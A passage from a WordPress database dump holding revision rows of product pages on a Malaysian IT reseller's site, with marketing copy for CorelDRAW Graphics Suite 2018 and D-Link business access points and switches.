software</h4>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n<h3 style=\"text-align: center;\">Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 11:56:10','2019-09-25 03:56:10','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(3349,1,'2019-09-25 11:56:46','2019-09-25 03:56:46','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n\r\n<h3 style=\"text-align: center;\">Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 11:56:46','2019-09-25 03:56:46','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(3351,1,'2019-09-25 11:58:00','2019-09-25 03:58:00','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: justify;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 11:58:00','2019-09-25 03:58:00','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(3352,1,'2019-09-25 11:58:59','2019-09-25 03:58:59','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: justify;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 11:58:59','2019-09-25 03:58:59','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(3353,1,'2019-09-25 12:00:25','2019-09-25 04:00:25','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: justify;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 12:00:25','2019-09-25 04:00:25','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(3354,1,'2019-09-25 12:09:46','2019-09-25 04:09:46','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:09:46','2019-09-25 04:09:46','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3355,1,'2019-09-25 12:11:29','2019-09-25 04:11:29','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 